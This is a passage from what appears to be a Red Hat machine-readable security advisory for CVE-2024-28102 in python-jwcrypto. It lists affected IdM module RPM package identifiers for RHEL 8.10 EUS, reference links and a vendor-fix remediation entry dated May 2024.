"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
